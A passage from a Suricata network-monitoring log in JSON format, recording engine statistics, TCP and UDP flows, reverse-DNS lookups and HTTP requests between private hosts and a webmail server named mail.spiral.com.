invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reas
sembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2749,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":86717,"memcap":0}}} {"timestamp":"2020-02-29T00:13:50.000191+0000","flow_id":569176254904198,"event_type":"flow","src_ip":"192.168.10.81","src_port":52740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:12:44.456582+0000","end":"2020-02-29T00:12:49.495013+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:50.001136+0000","flow_id":618010033054210,"event_type":"flow","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":2113,"bytes_toclient":27714,"start":"2020-02-29T00:12:44.451074+0000","end":"2020-02-29T00:12:49.823477+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:13:50.001870+0000","flow_id":1828739838965696,"event_type":"flow","src_ip":"192.168.10.81","src_port":52742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:12:44.456640+0000","end":"2020-02-29T00:12:49.495139+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000268+0000","flow_id":1572119837955811,"event_type":"flow","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":31,"pkts_toclient":45,"bytes_toserver":5382,"bytes_toclient":54890,"start":"2020-02-29T00:12:44.349923+0000","end":"2020-02-29T00:12:50.097921+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000970+0000","flow_id":1404448609633777,"event_type":"flow","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":65,"pkts_toclient":106,"bytes_toserver":11740,"bytes_toclient":134404,"start":"2020-02-29T00:12:43.886257+0000","end":"2020-02-29T00:12:50.111525+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.544391+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34822,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 
(X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38924,"tx_id":0}} {"timestamp":"2020-02-29T00:13:51.634397+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38735,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:51.831022+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117}} 
{"timestamp":"2020-02-29T00:13:53.127322+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60152,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:53.376536+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921}} 
{"timestamp":"2020-02-29T00:13:54.000207+0000","event_type":"stats","stats":{"uptime":14486,"capture":{"kernel_packets":135553,"kernel_drops":0},"decoder":{"pkts":135569,"bytes":93377242,"invalid":187,"ipv4":134070,"ipv6":8,"ethernet":135569,"raw":0,"null":0,"sll":0,"tcp":128752,"udp":5116,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2775,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2791,"synack":2782,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1814,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2337,"failed_udp":112},"tx":{"http":4669,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2417}},"flow_mgr":{"closed_pruned":2754,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23800,"memcap_state":0,"memcap_global":0},"http":{"memuse":138450,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:56.000396+0000","flow_id":886797661356645,"event_type":"flow","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:55.311909+0000","end":"2020-02-29T00:08:55.421067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:56.836058+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34824,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33564,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.000208+0000","flow_id":432368661990283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1832,"bytes_toclient":8349,"start":"2020-02-29T00:12:50.953227+0000","end":"2020-02-29T00:12:56.254674+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:13:57.001387+0000","flow_id":1905800142540588,"event_type":"flow","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1082,"bytes_toclient":1019,"start":"2020-02-29T00:12:50.937772+0000","end":"2020-02-29T00:12:56.091654+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:57.589667+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44801,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.600559+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61162,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:57.765520+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464}} {"timestamp":"2020-02-29T00:14:00.000707+0000","flow_id":795898973717572,"event_type":"flow","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:59.853060+0000","end":"2020-02-29T00:08:59.961986+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:14:01.000432+0000","event_type":"stats","stats":{"uptime":14493,"capture":{"kernel_packets":135593,"kernel_drops":0},"decoder":{"pkts":135603,"bytes":93394794,"invalid":187,"ipv4":134104,"ipv6":8,"ethernet":135603,"raw":0,"null":0,"sll":0,"tcp":128782,"udp":5120,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2776,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2792,"synack":2783,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2339,"failed_udp":112},"tx":{"http":4671,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2419}},"flow_mgr":{"closed_pruned":2756,"new_pruned":15,"est_pruned":2380,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23470,"memcap_state":0,"memcap_global":0},"http":{"memuse":87581,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:01.005964+0000","flow_id":1395802825860624,"event_type":"flow","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:00.304656+0000","end":"2020-02-29T00:09:00.413211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:02.766663+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":28285,"tx_id":1}} {"timestamp":"2020-02-29T00:14:05.000841+0000","flow_id":98370530812316,"event_type":"flow","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1290,"bytes_toclient":810,"start":"2020-02-29T00:12:59.565660+0000","end":"2020-02-29T00:13:04.757093+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:05.878088+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:06.315620+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756}} {"timestamp":"2020-02-29T00:14:07.002983+0000","flow_id":1205458465593479,"event_type":"flow","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.858247+0000","end":"2020-02-29T00:09:06.968272+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:14:07.003817+0000","flow_id":1235763754834258,"event_type":"flow","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.465234+0000","end":"2020-02-29T00:09:06.573102+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:07.003916+0000","flow_id":816196989671691,"event_type":"flow","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.448779+0000","end":"2020-02-29T00:09:06.557375+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:08.000400+0000","event_type":"stats","stats":{"uptime":14500,"capture":{"kernel_packets":135612,"kernel_drops":0},"decoder":{"pkts":135615,"bytes":93396136,"invalid":187,"ipv4":134114,"ipv6":8,"ethernet":135615,"raw":0,"null":0,"sll":0,"tcp":128790,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_
layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2757,"new_pruned":15,"est_pruned":2382,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":87604,"memcap":0}}} {"timestamp":"2020-02-29T00:14:11.000286+0000","flow_id":858648459774048,"event_type":"flow","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":3106,"bytes_toclient":7263,"start":"2020-02-29T00:12:30.428128+0000","end":"2020-02-29T00:13:10.761246+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:11.001647+0000","flow_id":339305296184252,"event_type":"flow","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:10.345020+0000","end":"2020-02-29T00:09:10.453617+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:11.316083+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34826,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33150,"tx_id":0}} {"timestamp":"2020-02-29T00:14:13.001135+0000","flow_id":1076287324585437,"event_type":"flow","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:12.622045+0000","end":"2020-02-29T00:09:12.730774+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:15.000220+0000","event_type":"stats","stats":{"uptime":14507,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":
0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2758,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35749,"memcap":0}}} {"timestamp":"2020-02-29T00:14:16.000255+0000","flow_id":579939444423429,"event_type":"flow","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":22,"bytes_toserver":3065,"bytes_toclient":20115,"start":"2020-02-29T00:13:07.293637+0000","end":"2020-02-29T00:13:15.784000+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:18.000797+0000","flow_id":700400392481363,"event_type":"flow","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:13:12.010835+0000","end":"2020-02-29T00:13:17.187494+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
